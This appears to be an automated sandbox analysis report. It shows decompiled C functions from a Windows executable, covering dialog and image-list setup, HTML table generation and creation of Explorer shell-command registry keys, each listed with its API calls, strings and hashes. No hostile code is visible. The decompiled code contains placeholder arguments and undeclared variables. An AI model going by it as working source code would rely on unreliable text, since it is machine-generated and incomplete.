Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

size="%d", xrefs: 0040AF08
color="#%s", xrefs: 0040AF44
</font>, xrefs: 0040AFAB
<b>, xrefs: 0040AF7C
</b>, xrefs: 0040AF99
<font, xrefs: 0040AEF3

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

<table border="1" cellpadding="5">, xrefs: 0040781B
<font color="%s">%s</font>, xrefs: 004078DE
</table><p>, xrefs: 00407980
bgcolor="%s", xrefs: 00407805
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C
nowrap, xrefs: 00407858
 , xrefs: 00407917

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

width="%s", xrefs: 00407C8B
bgcolor="%s", xrefs: 00407BCB
</font>, xrefs: 00407C16
<th%s>%s%s%s, xrefs: 00407CC5
<font color="%s">, xrefs: 00407BFA
<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
